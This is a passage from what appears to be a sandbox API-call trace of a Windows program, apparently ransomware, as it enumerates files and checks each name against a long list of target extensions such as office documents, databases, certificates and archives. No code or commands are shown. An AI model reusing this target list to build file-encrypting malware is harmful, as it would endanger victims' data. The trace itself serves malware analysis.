[0165.181] lstrlenW (lpString=".myi") returned 4 [0165.181] lstrcmpiW (lpString1=".myi", lpString2=".dll") returned 1 [0165.181] lstrlenW (lpString=".nef") returned 4 [0165.182] lstrcmpiW (lpString1=".nef", lpString2=".dll") returned 1 [0165.182] lstrlenW (lpString=".nrw") returned 4 [0165.182] lstrcmpiW (lpString1=".nrw", lpString2=".dll") returned 1 [0165.182] lstrlenW (lpString=".obj") returned 4 [0165.182] lstrcmpiW (lpString1=".obj", lpString2=".dll") returned 1 [0165.182] lstrlenW (lpString=".odb") returned 4 [0165.182] lstrcmpiW (lpString1=".odb", lpString2=".dll") returned 1 [0165.182] lstrlenW (lpString=".odc") returned 4 [0165.182] lstrcmpiW (lpString1=".odc", lpString2=".dll") returned 1 [0165.182] lstrlenW (lpString=".odm") returned 4 [0165.182] lstrcmpiW (lpString1=".odm", lpString2=".dll") returned 1 [0165.182] lstrlenW (lpString=".odp") returned 4 [0165.182] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0165.182] lstrlenW (lpString=".ods") returned 4 [0165.182] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0165.182] lstrlenW (lpString=".oft") returned 4 [0165.182] lstrcmpiW (lpString1=".oft", lpString2=".dll") returned 1 [0165.182] lstrlenW (lpString=".one") returned 4 [0165.182] lstrcmpiW (lpString1=".one", lpString2=".dll") returned 1 [0166.919] lstrlenW (lpString=".onepkg") returned 7 [0166.919] lstrcmpiW (lpString1=".onepkg", lpString2="OBE.dll") returned -1 [0166.919] lstrlenW (lpString=".onetoc2") returned 8 [0166.919] lstrcmpiW (lpString1=".onetoc2", lpString2="OOBE.dll") returned -1 [0166.919] lstrlenW (lpString=".opt") returned 4 [0166.919] lstrcmpiW (lpString1=".opt", lpString2=".dll") returned 1 [0166.989] lstrlenW (lpString=".oqy") returned 4 [0166.989] lstrcmpiW (lpString1=".oqy", lpString2=".dll") returned 1 [0166.989] lstrlenW (lpString=".orf") returned 4 [0166.989] lstrcmpiW (lpString1=".orf", lpString2=".dll") returned 1 [0166.989] lstrlenW (lpString=".p12") returned 4 [0166.989] lstrcmpiW (lpString1=".p12", lpString2=".dll") returned 1 [0166.989] lstrlenW (lpString=".p7b") returned 4 [0166.989] lstrcmpiW (lpString1=".p7b", lpString2=".dll") returned 1 [0166.989] lstrlenW (lpString=".p7c") returned 4 [0166.989] lstrcmpiW (lpString1=".p7c", lpString2=".dll") returned 1 [0166.989] lstrlenW (lpString=".pam") returned 4 [0166.989] lstrcmpiW (lpString1=".pam", lpString2=".dll") returned 1 [0166.989] lstrlenW (lpString=".pbm") returned 4 [0166.989] lstrcmpiW (lpString1=".pbm", lpString2=".dll") returned 1 [0166.989] lstrlenW (lpString=".pct") returned 4 [0166.989] lstrcmpiW (lpString1=".pct", lpString2=".dll") returned 1 [0166.989] lstrlenW (lpString=".pcx") returned 4 [0166.989] lstrcmpiW (lpString1=".pcx", lpString2=".dll") returned 1 [0166.989] lstrlenW (lpString=".pdd") returned 4 [0166.989] lstrcmpiW (lpString1=".pdd", lpString2=".dll") returned 1 [0166.990] lstrlenW (lpString=".pdf") returned 4 [0166.990] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0166.990] lstrlenW (lpString=".pdp") returned 4 [0166.990] lstrcmpiW (lpString1=".pdp", lpString2=".dll") returned 1 [0166.990] lstrlenW (lpString=".pef") returned 4 [0166.990] lstrcmpiW (lpString1=".pef", lpString2=".dll") returned 1 [0166.990] lstrlenW (lpString=".pem") returned 4 [0166.990] lstrcmpiW (lpString1=".pem", lpString2=".dll") returned 1 [0166.990] lstrlenW (lpString=".pff") returned 4 [0166.990] lstrcmpiW (lpString1=".pff", lpString2=".dll") returned 1 [0166.990] lstrlenW (lpString=".pfm") returned 4 [0166.990] lstrcmpiW (lpString1=".pfm", lpString2=".dll") returned 1 [0166.990] lstrlenW (lpString=".pfx") returned 4 [0166.990] lstrcmpiW (lpString1=".pfx", lpString2=".dll") returned 1 [0166.990] lstrlenW (lpString=".pgm") returned 4 [0166.990] lstrcmpiW (lpString1=".pgm", lpString2=".dll") returned 1 [0166.990] lstrlenW (lpString=".php") returned 4 [0166.990] lstrcmpiW (lpString1=".php", lpString2=".dll") returned 1 [0166.990] lstrlenW (lpString=".php3") returned 5 [0166.990] lstrcmpiW (lpString1=".php3", lpString2="E.dll") returned -1 [0166.990] lstrlenW (lpString=".php4") returned 5 [0166.990] lstrcmpiW (lpString1=".php4", lpString2="E.dll") returned -1 [0166.990] lstrlenW (lpString=".php5") returned 5 [0166.990] lstrcmpiW (lpString1=".php5", lpString2="E.dll") returned -1 [0166.990] lstrlenW (lpString=".phtml") returned 6 [0166.990] lstrcmpiW (lpString1=".phtml", lpString2="BE.dll") returned -1 [0166.990] lstrlenW (lpString=".pict") returned 5 [0166.990] lstrcmpiW (lpString1=".pict", lpString2="E.dll") returned -1 [0166.991] lstrlenW (lpString=".pl") returned 3 [0166.991] lstrcmpiW (lpString1=".pl", lpString2="dll") returned -1 [0166.991] lstrlenW (lpString=".pls") returned 4 [0166.991] lstrcmpiW (lpString1=".pls", lpString2=".dll") returned 1 [0166.991] lstrlenW (lpString=".pm") returned 3 [0166.991] lstrcmpiW (lpString1=".pm", lpString2="dll") returned -1 [0166.991] lstrlenW (lpString=".png") returned 4 [0166.991] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0166.991] lstrlenW (lpString=".pnm") returned 4 [0166.991] lstrcmpiW (lpString1=".pnm", lpString2=".dll") returned 1 [0166.991] lstrlenW (lpString=".pot") returned 4 [0166.991] lstrcmpiW (lpString1=".pot", lpString2=".dll") returned 1 [0166.991] lstrlenW (lpString=".potm") returned 5 [0166.991] lstrcmpiW (lpString1=".potm", lpString2="E.dll") returned -1 [0166.991] lstrlenW (lpString=".potx") returned 5 [0166.991] lstrcmpiW (lpString1=".potx", lpString2="E.dll") returned -1 [0166.991] lstrlenW (lpString=".ppa") returned 4 [0166.991] lstrcmpiW (lpString1=".ppa", lpString2=".dll") returned 1 [0166.991] lstrlenW (lpString=".ppam") returned 5 [0166.991] lstrcmpiW (lpString1=".ppam", lpString2="E.dll") returned -1 [0166.991] lstrlenW (lpString=".ppm") returned 4 [0166.991] lstrcmpiW (lpString1=".ppm", lpString2=".dll") returned 1 [0166.991] lstrlenW (lpString=".pps") returned 4 [0166.991] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0166.991] lstrlenW (lpString=".ppsm") returned 5 [0166.991] lstrcmpiW (lpString1=".ppsm", lpString2="E.dll") returned -1 [0166.991] lstrlenW (lpString=".ppt") returned 4 [0166.992] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0166.992] lstrlenW (lpString=".pptm") returned 5 [0166.992] lstrcmpiW (lpString1=".pptm", lpString2="E.dll") returned -1 [0166.992] lstrlenW (lpString=".pptx") returned 5 [0166.992] lstrcmpiW (lpString1=".pptx", lpString2="E.dll") returned -1 [0166.992] lstrlenW (lpString=".prn") returned 4 [0166.992] lstrcmpiW (lpString1=".prn", lpString2=".dll") returned 1 [0166.992] lstrlenW (lpString=".ps") returned 3 [0166.992] lstrcmpiW (lpString1=".ps", lpString2="dll") returned -1 [0166.992] lstrlenW (lpString=".psb") returned 4 [0166.992] lstrcmpiW (lpString1=".psb", lpString2=".dll") returned 1 [0166.992] lstrlenW (lpString=".psd") returned 4 [0166.992] lstrcmpiW (lpString1=".psd", lpString2=".dll") returned 1 [0166.992] lstrlenW (lpString=".pst") returned 4 [0166.992] lstrcmpiW (lpString1=".pst", lpString2=".dll") returned 1 [0166.992] lstrlenW (lpString=".ptx") returned 4 [0166.992] lstrcmpiW (lpString1=".ptx", lpString2=".dll") returned 1 [0166.992] lstrlenW (lpString=".pub") returned 4 [0166.992] lstrcmpiW (lpString1=".pub", lpString2=".dll") returned 1 [0166.992] lstrlenW (lpString=".pwm") returned 4 [0166.992] lstrcmpiW (lpString1=".pwm", lpString2=".dll") returned 1 [0166.992] lstrlenW (lpString=".pxr") returned 4 [0166.992] lstrcmpiW (lpString1=".pxr", lpString2=".dll") returned 1 [0166.992] lstrlenW (lpString=".py") returned 3 [0166.992] lstrcmpiW (lpString1=".py", lpString2="dll") returned -1 [0166.992] lstrlenW (lpString=".qt") returned 3 [0166.992] lstrcmpiW (lpString1=".qt", lpString2="dll") returned -1 [0166.992] lstrlenW (lpString=".r3d") returned 4 [0166.992] lstrcmpiW (lpString1=".r3d", lpString2=".dll") returned 1 [0166.993] lstrlenW (lpString=".raf") returned 4 [0166.993] lstrcmpiW (lpString1=".raf", lpString2=".dll") returned 1 [0166.993] lstrlenW (lpString=".rar") returned 4 [0166.993] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0166.993] lstrlenW (lpString=".raw") returned 4 [0166.993] lstrcmpiW (lpString1=".raw", lpString2=".dll") returned 1 [0166.993] lstrlenW (lpString=".rdf") returned 4 [0166.993] lstrcmpiW (lpString1=".rdf", lpString2=".dll") returned 1 [0166.993] lstrlenW (lpString=".rgbe") returned 5 [0166.993] lstrcmpiW (lpString1=".rgbe", lpString2="E.dll") returned -1 [0166.993] lstrlenW (lpString=".rle") returned 4 [0166.993] lstrcmpiW (lpString1=".rle", lpString2=".dll") returned 1 [0166.993] lstrlenW (lpString=".rqy") returned 4 [0166.993] lstrcmpiW (lpString1=".rqy", lpString2=".dll") returned 1 [0166.993] lstrlenW (lpString=".rss") returned 4 [0166.993] lstrcmpiW (lpString1=".rss", lpString2=".dll") returned 1 [0166.993] lstrlenW (lpString=".rtf") returned 4 [0166.993] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0166.993] lstrlenW (lpString=".rw2") returned 4 [0166.993] lstrcmpiW (lpString1=".rw2", lpString2=".dll") returned 1 [0166.993] lstrlenW (lpString=".rwl") returned 4 [0166.993] lstrcmpiW (lpString1=".rwl", lpString2=".dll") returned 1 [0166.993] lstrlenW (lpString=".safe") returned 5 [0166.993] lstrcmpiW (lpString1=".safe", lpString2="E.dll") returned -1 [0166.993] lstrlenW (lpString=".sct") returned 4 [0166.993] lstrcmpiW (lpString1=".sct", lpString2=".dll") returned 1 [0166.993] lstrlenW (lpString=".sdpx") returned 5 [0166.993] lstrcmpiW (lpString1=".sdpx", lpString2="E.dll") returned -1 [0166.993] lstrlenW (lpString=".shtm") returned 5 [0166.994] lstrcmpiW (lpString1=".shtm", lpString2="E.dll") returned -1 [0166.994] lstrlenW (lpString=".shtml") returned 6 [0166.994] lstrcmpiW (lpString1=".shtml", lpString2="BE.dll") returned -1 [0166.994] lstrlenW (lpString=".slk") returned 4 [0166.994] lstrcmpiW (lpString1=".slk", lpString2=".dll") returned 1 [0166.994] lstrlenW (lpString=".sln") returned 4 [0166.994] lstrcmpiW (lpString1=".sln", lpString2=".dll") returned 1 [0166.994] lstrlenW (lpString=".sql") returned 4 [0166.994] lstrcmpiW (lpString1=".sql", lpString2=".dll") returned 1 [0166.994] lstrlenW (lpString=".sr2") returned 4 [0166.994] lstrcmpiW (lpString1=".sr2", lpString2=".dll") returned 1 [0166.994] lstrlenW (lpString=".srf") returned 4 [0166.994] lstrcmpiW (lpString1=".srf", lpString2=".dll") returned 1 [0166.994] lstrlenW (lpString=".srw") returned 4 [0166.994] lstrcmpiW (lpString1=".srw", lpString2=".dll") returned 1 [0166.994] lstrlenW (lpString=".ssi") returned 4 [0166.994] lstrcmpiW (lpString1=".ssi", lpString2=".dll") returned 1 [0166.994] lstrlenW (lpString=".st") returned 3 [0166.994] lstrcmpiW (lpString1=".st", lpString2="dll") returned -1 [0166.994] lstrlenW (lpString=".stm") returned 4 [0166.994] lstrcmpiW (lpString1=".stm", lpString2=".dll") returned 1 [0166.994] lstrlenW (lpString=".svg") returned 4 [0166.994] lstrcmpiW (lpString1=".svg", lpString2=".dll") returned 1 [0166.994] lstrlenW (lpString=".svgz") returned 5 [0166.995] lstrcmpiW (lpString1=".svgz", lpString2="E.dll") returned -1 [0166.995] lstrlenW (lpString=".swf") returned 4 [0166.995] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0166.995] lstrlenW (lpString=".tab") returned 4 [0166.995] lstrcmpiW (lpString1=".tab", lpString2=".dll") returned 1 [0166.995] lstrlenW (lpString=".tar") returned 4 [0166.995] lstrcmpiW (lpString1=".tar", lpString2=".dll") returned 1 [0166.995] lstrlenW (lpString=".tbb") returned 4 [0166.995] lstrcmpiW (lpString1=".tbb", lpString2=".dll") returned 1 [0166.995] lstrlenW (lpString=".tbi") returned 4 [0166.995] lstrcmpiW (lpString1=".tbi", lpString2=".dll") returned 1 [0166.995] lstrlenW (lpString=".tbk") returned 4 [0166.995] lstrcmpiW (lpString1=".tbk", lpString2=".dll") returned 1 [0166.995] lstrlenW (lpString=".tdi") returned 4 [0166.995] lstrcmpiW (lpString1=".tdi", lpString2=".dll") returned 1 [0166.995] lstrlenW (lpString=".tga") returned 4 [0166.995] lstrcmpiW (lpString1=".tga", lpString2=".dll") returned 1 [0166.995] lstrlenW (lpString=".thmx") returned 5 [0166.995] lstrcmpiW (lpString1=".thmx", lpString2="E.dll") returned -1 [0166.995] lstrlenW (lpString=".tif") returned 4 [0166.995] lstrcmpiW (lpString1=".tif", lpString2=".dll") returned 1 [0166.995] lstrlenW (lpString=".tiff") returned 5 [0166.995] lstrcmpiW (lpString1=".tiff", lpString2="E.dll") returned -1 [0166.995] lstrlenW (lpString=".tld") returned 4 [0166.995] lstrcmpiW (lpString1=".tld", lpString2=".dll") returned 1 [0166.995] lstrlenW (lpString=".torrent") returned 8 [0166.995] lstrcmpiW (lpString1=".torrent", lpString2="OOBE.dll") returned -1 [0166.995] lstrlenW (lpString=".tpl") returned 4 [0166.996] lstrcmpiW (lpString1=".tpl", lpString2=".dll") returned 1 [0166.996] lstrlenW (lpString=".txt") returned 4 [0166.996] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0166.996] lstrlenW (lpString=".u3d") returned 4 [0166.996] lstrcmpiW (lpString1=".u3d", lpString2=".dll") returned 1 [0166.996] lstrlenW (lpString=".udl") returned 4 [0166.996] lstrcmpiW (lpString1=".udl", lpString2=".dll") returned 1 [0166.996] lstrlenW (lpString=".uxdc") returned 5 [0166.996] lstrcmpiW (lpString1=".uxdc", lpString2="E.dll") returned -1 [0166.996] lstrlenW (lpString=".vb") returned 3 [0166.996] lstrcmpiW (lpString1=".vb", lpString2="dll") returned -1 [0166.996] lstrlenW (lpString=".vbs") returned 4 [0166.996] lstrcmpiW (lpString1=".vbs", lpString2=".dll") returned 1 [0166.996] lstrlenW (lpString=".vcs") returned 4 [0166.996] lstrcmpiW (lpString1=".vcs", lpString2=".dll") returned 1 [0166.996] lstrlenW (lpString=".vda") returned 4 [0166.996] lstrcmpiW (lpString1=".vda", lpString2=".dll") returned 1 [0166.996] lstrlenW (lpString=".vdr") returned 4 [0166.996] lstrcmpiW (lpString1=".vdr", lpString2=".dll") returned 1 [0166.996] lstrlenW (lpString=".vdw") returned 4 [0166.996] lstrcmpiW (lpString1=".vdw", lpString2=".dll") returned 1 [0166.996] lstrlenW (lpString=".vdx") returned 4 [0166.996] lstrcmpiW (lpString1=".vdx", lpString2=".dll") returned 1 [0166.996] lstrlenW (lpString=".vrp") returned 4 [0166.996] lstrcmpiW (lpString1=".vrp", lpString2=".dll") returned 1 [0166.996] lstrlenW (lpString=".vsd") returned 4 [0166.996] lstrcmpiW (lpString1=".vsd", lpString2=".dll") returned 1 [0166.996] lstrlenW (lpString=".vss") returned 4 [0166.996] lstrcmpiW (lpString1=".vss", lpString2=".dll") returned 1 [0166.997] lstrlenW (lpString=".vst") returned 4 [0166.997] lstrcmpiW (lpString1=".vst", lpString2=".dll") returned 1 [0166.997] lstrlenW (lpString=".vsw") returned 4 [0166.997] lstrcmpiW (lpString1=".vsw", lpString2=".dll") returned 1 [0166.997] lstrlenW (lpString=".vsx") returned 4 [0166.997] lstrcmpiW (lpString1=".vsx", lpString2=".dll") returned 1 [0166.997] lstrlenW (lpString=".vtm") returned 4 [0166.997] lstrcmpiW (lpString1=".vtm", lpString2=".dll") returned 1 [0166.997] lstrlenW (lpString=".vtml") returned 5 [0166.997] lstrcmpiW (lpString1=".vtml", lpString2="E.dll") returned -1 [0166.997] lstrlenW (lpString=".vtx") returned 4 [0166.997] lstrcmpiW (lpString1=".vtx", lpString2=".dll") returned 1 [0166.997] lstrlenW (lpString=".wb2") returned 4 [0166.997] lstrcmpiW (lpString1=".wb2", lpString2=".dll") returned 1 [0166.997] lstrlenW (lpString=".wav") returned 4 [0166.997] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0166.997] lstrlenW (lpString=".wbm") returned 4 [0166.997] lstrcmpiW (lpString1=".wbm", lpString2=".dll") returned 1 [0166.997] lstrlenW (lpString=".wbmp") returned 5 [0166.997] lstrcmpiW (lpString1=".wbmp", lpString2="E.dll") returned -1 [0166.997] lstrlenW (lpString=".wim") returned 4 [0166.997] lstrcmpiW (lpString1=".wim", lpString2=".dll") returned 1 [0166.997] lstrlenW (lpString=".wmf") returned 4 [0166.997] lstrcmpiW (lpString1=".wmf", lpString2=".dll") returned 1 [0166.997] lstrlenW (lpString=".wml") returned 4 [0166.997] lstrcmpiW (lpString1=".wml", lpString2=".dll") returned 1 [0166.997] lstrlenW (lpString=".wmv") returned 4 [0166.997] lstrcmpiW (lpString1=".wmv", lpString2=".dll") returned 1 [0166.998] lstrlenW (lpString=".wpd") returned 4 [0166.998] lstrcmpiW (lpString1=".wpd", lpString2=".dll") returned 1 [0166.998] lstrlenW (lpString=".wps") returned 4 [0166.998] lstrcmpiW (lpString1=".wps", lpString2=".dll") returned 1 [0166.998] lstrlenW (lpString=".x3f") returned 4 [0166.998] lstrcmpiW (lpString1=".x3f", lpString2=".dll") returned 1 [0166.998] lstrlenW (lpString=".xl") returned 3 [0166.998] lstrcmpiW (lpString1=".xl", lpString2="dll") returned -1 [0166.998] lstrlenW (lpString=".xla") returned 4 [0166.998] lstrcmpiW (lpString1=".xla", lpString2=".dll") returned 1 [0166.998] lstrlenW (lpString=".xlam") returned 5 [0166.998] lstrcmpiW (lpString1=".xlam", lpString2="E.dll") returned -1 [0166.998] lstrlenW (lpString=".xlk") returned 4 [0166.998] lstrcmpiW (lpString1=".xlk", lpString2=".dll") returned 1 [0166.998] lstrlenW (lpString=".xlm") returned 4 [0166.998] lstrcmpiW (lpString1=".xlm", lpString2=".dll") returned 1 [0166.998] lstrlenW (lpString=".xls") returned 4 [0166.998] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0166.998] lstrlenW (lpString=".xlsb") returned 5 [0166.998] lstrcmpiW (lpString1=".xlsb", lpString2="E.dll") returned -1 [0166.998] lstrlenW (lpString=".xlsm") returned 5 [0166.998] lstrcmpiW (lpString1=".xlsm", lpString2="E.dll") returned -1 [0166.998] lstrlenW (lpString=".xlsx") returned 5 [0166.998] lstrcmpiW (lpString1=".xlsx", lpString2="E.dll") returned -1 [0166.998] lstrlenW (lpString=".xlt") returned 4 [0166.998] lstrcmpiW (lpString1=".xlt", lpString2=".dll") returned 1 [0166.998] lstrlenW (lpString=".xltm") returned 5 [0166.998] lstrcmpiW (lpString1=".xltm", lpString2="E.dll") returned -1 [0166.998] lstrlenW (lpString=".xltx") returned 5 [0166.999] lstrcmpiW (lpString1=".xltx", lpString2="E.dll") returned -1 [0166.999] lstrlenW (lpString=".xlw") returned 4 [0166.999] lstrcmpiW (lpString1=".xlw", lpString2=".dll") returned 1 [0166.999] lstrlenW (lpString=".xml") returned 4 [0166.999] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0166.999] lstrlenW (lpString=".xps") returned 4 [0166.999] lstrcmpiW (lpString1=".xps", lpString2=".dll") returned 1 [0166.999] lstrlenW (lpString=".xsd") returned 4 [0166.999] lstrcmpiW (lpString1=".xsd", lpString2=".dll") returned 1 [0166.999] lstrlenW (lpString=".xsf") returned 4 [0166.999] lstrcmpiW (lpString1=".xsf", lpString2=".dll") returned 1 [0166.999] lstrlenW (lpString=".xsl") returned 4 [0166.999] lstrcmpiW (lpString1=".xsl", lpString2=".dll") returned 1 [0166.999] lstrlenW (lpString=".xslt") returned 5 [0166.999] lstrcmpiW (lpString1=".xslt", lpString2="E.dll") returned -1 [0166.999] lstrlenW (lpString=".xsn") returned 4 [0166.999] lstrcmpiW (lpString1=".xsn", lpString2=".dll") returned 1 [0166.999] lstrlenW (lpString=".xtp") returned 4 [0166.999] lstrcmpiW (lpString1=".xtp", lpString2=".dll") returned 1 [0166.999] lstrlenW (lpString=".xtp2") returned 5 [0166.999] lstrcmpiW (lpString1=".xtp2", lpString2="E.dll") returned -1 [0166.999] lstrlenW (lpString=".xyze") returned 5 [0166.999] lstrcmpiW (lpString1=".xyze", lpString2="E.dll") returned -1 [0166.999] lstrlenW (lpString=".xz") returned 3 [0166.999] lstrcmpiW (lpString1=".xz", lpString2="dll") returned -1 [0166.999] lstrlenW (lpString=".zip") returned 4 [0166.999] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0167.000] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0167.000] lstrlenW (lpString="GetCurrentRollback.ini") returned 22 [0167.000] lstrlenW (lpString=".1cd") returned 4 [0167.000] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0167.000] lstrlenW (lpString=".3ds") returned 4 [0167.000] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0167.000] lstrlenW (lpString=".3fr") returned 4 [0167.000] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0167.000] lstrlenW (lpString=".3g2") returned 4 [0167.000] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0167.000] lstrlenW (lpString=".3gp") returned 4 [0167.000] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0167.000] lstrlenW (lpString=".7z") returned 3 [0167.000] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0167.000] lstrlenW (lpString=".accda") returned 6 [0167.000] lstrcmpiW (lpString1=".accda", lpString2="ck.ini") returned -1 [0167.000] lstrlenW (lpString=".accdb") returned 6 [0167.000] lstrcmpiW (lpString1=".accdb", lpString2="ck.ini") returned -1 [0167.000] lstrlenW (lpString=".accdc") returned 6 [0167.000] lstrcmpiW (lpString1=".accdc", lpString2="ck.ini") returned -1 [0167.000] lstrlenW (lpString=".accde") returned 6 [0167.000] lstrcmpiW (lpString1=".accde", lpString2="ck.ini") returned -1 [0167.000] lstrlenW (lpString=".accdt") returned 6 [0167.000] lstrcmpiW (lpString1=".accdt", lpString2="ck.ini") returned -1 [0167.000] lstrlenW (lpString=".accdw") returned 6 [0167.000] lstrcmpiW (lpString1=".accdw", lpString2="ck.ini") returned -1 [0167.001] lstrlenW (lpString=".adb") returned 4 [0167.001] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0167.001] lstrlenW (lpString=".adp") returned 4 [0167.001] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0167.001] lstrlenW (lpString=".ai") returned 3 [0167.001] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0167.001] lstrlenW (lpString=".ai3") returned 4 [0167.001] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0167.001] lstrlenW (lpString=".ai4") returned 4 [0167.001] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0167.001] lstrlenW (lpString=".ai5") returned 4 [0167.001] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0167.001] lstrlenW (lpString=".ai6") returned 4 [0167.001] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0167.001] lstrlenW (lpString=".ai7") returned 4 [0167.001] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0167.001] lstrlenW (lpString=".ai8") returned 4 [0167.001] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0167.001] lstrlenW (lpString=".anim") returned 5 [0167.001] lstrcmpiW (lpString1=".anim", lpString2="k.ini") returned -1 [0167.001] lstrlenW (lpString=".arw") returned 4 [0167.001] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0167.001] lstrlenW (lpString=".as") returned 3 [0167.001] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0167.001] lstrlenW (lpString=".asa") returned 4 [0167.001] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0167.001] lstrlenW (lpString=".asc") returned 4 [0167.001] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0167.002] lstrlenW (lpString=".ascx") returned 5 [0167.002] lstrcmpiW (lpString1=".ascx", lpString2="k.ini") returned -1 [0167.002] lstrlenW (lpString=".asm") returned 4 [0167.002] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0167.002] lstrlenW (lpString=".asmx") returned 5 [0167.002] lstrcmpiW (lpString1=".asmx", lpString2="k.ini") returned -1 [0167.002] lstrlenW (lpString=".asp") returned 4 [0167.002] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0167.002] lstrlenW (lpString=".aspx") returned 5 [0167.002] lstrcmpiW (lpString1=".aspx", lpString2="k.ini") returned -1 [0167.002] lstrlenW (lpString=".asr") returned 4 [0167.002] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0167.002] lstrlenW (lpString=".asx") returned 4 [0167.002] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0167.002] lstrlenW (lpString=".avi") returned 4 [0167.002] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0167.002] lstrlenW (lpString=".avs") returned 4 [0167.002] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0167.002] lstrlenW (lpString=".backup") returned 7 [0167.002] lstrcmpiW (lpString1=".backup", lpString2="ack.ini") returned -1 [0167.002] lstrlenW (lpString=".bak") returned 4 [0167.002] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0167.002] lstrlenW (lpString=".bay") returned 4 [0167.002] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0167.002] lstrlenW (lpString=".bd") returned 3 [0167.002] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0167.002] lstrlenW (lpString=".bin") returned 4 [0167.002] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0167.003] lstrlenW (lpString=".bmp") returned 4 [0167.003] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0167.003] lstrlenW (lpString=".bz2") returned 4 [0167.003] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0167.003] lstrlenW (lpString=".c") returned 2 [0167.003] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0167.003] lstrlenW (lpString=".cdr") returned 4 [0167.003] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0167.003] lstrlenW (lpString=".cer") returned 4 [0167.003] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0167.003] lstrlenW (lpString=".cf") returned 3 [0167.003] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0167.003] lstrlenW (lpString=".cfc") returned 4 [0167.003] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0167.003] lstrlenW (lpString=".cfm") returned 4 [0167.003] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0167.003] lstrlenW (lpString=".cfml") returned 5 [0167.003] lstrcmpiW (lpString1=".cfml", lpString2="k.ini") returned -1 [0167.003] lstrlenW (lpString=".cfu") returned 4 [0167.003] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0167.003] lstrlenW (lpString=".chm") returned 4 [0167.003] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0167.003] lstrlenW (lpString=".cin") returned 4 [0167.003] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0167.003] lstrlenW (lpString=".class") returned 6 [0167.003] lstrcmpiW (lpString1=".class", lpString2="ck.ini") returned -1 [0167.003] lstrlenW (lpString=".clx") returned 4 [0167.003] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0167.004] lstrlenW (lpString=".config") returned 7 [0167.004] lstrcmpiW (lpString1=".config", lpString2="ack.ini") returned -1 [0167.004] lstrlenW (lpString=".cpp") returned 4 [0167.004] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0167.004] lstrlenW (lpString=".cr2") returned 4 [0167.004] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0167.004] lstrlenW (lpString=".crt") returned 4 [0167.004] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0167.004] lstrlenW (lpString=".crw") returned 4 [0167.004] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0167.004] lstrlenW (lpString=".cs") returned 3 [0167.004] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0167.004] lstrlenW (lpString=".css") returned 4 [0167.004] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0167.004] lstrlenW (lpString=".csv") 